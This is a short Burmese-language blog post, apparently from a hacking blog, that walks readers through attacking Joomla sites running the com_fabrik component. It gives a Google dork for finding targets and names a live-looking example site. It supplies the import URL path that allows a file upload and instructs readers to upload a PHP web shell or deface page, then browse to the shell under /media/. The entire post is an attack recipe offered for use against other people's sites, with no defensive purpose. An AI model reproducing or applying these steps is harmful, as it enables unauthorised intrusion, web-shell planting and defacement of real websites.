Joomla Hacking ေနာက္တနည္းေပါ့ ~ :D Joomla Hacking ေတြအမ်ားျကီးရွိပါတယ္.. ရွာျကည့္ေပါ့ exploit ေတြမွာ .. :D ခုဟာက ဒီထဲက တနည္းပါ ..
Google Dork : inurl:index.php?option=com_fabrik or index.php?option=com_fabrik
ဒါကို Google ထဲမွာ၇ွာျပီး Vulnerability ျဖစ္တဲ့ link ေတြ က်လာပါလိမ့္မယ္.. ဒီထဲက တခု ေရြးလိုက္ပါ ..
ဥပမာ => http://www.scb.travel/index.php?option=com_fabrik&view=table&tableid=9&calculations=0&Itemid=85
ဒါဆို .. သူ ့အေနာက္ကေနျပီး Vulnerable Path လုိက္ေပးပါ ..
Coad : index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
E.g => http://www.scb.travel/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
ဒါဆို ေအာက္ကျပထားတဲ့ ပံုစံအတိုင္းေလးေပၚလာပါလိမ့္မယ္..
(မေပၚတဲ့ဟာေတြ၇ွိပါတယ္ ။ မေပၚ၇င္ Next One ေပါ့) :P
ေပၚလာလို ့ရွိရင္ ကိုယ့္ File Upload လုပ္ေပးပါ ..
ဥပမာ => (liT2le.php , mhudeface.html)
အားလံုးျပီးျပီဆို ကုိယ့္ Shell ကိုျပန္ျကည့္ရေအာင္ >> http://www.liT2le_uNkn0w/media/yourshell.php
0 comments:
Post a Comment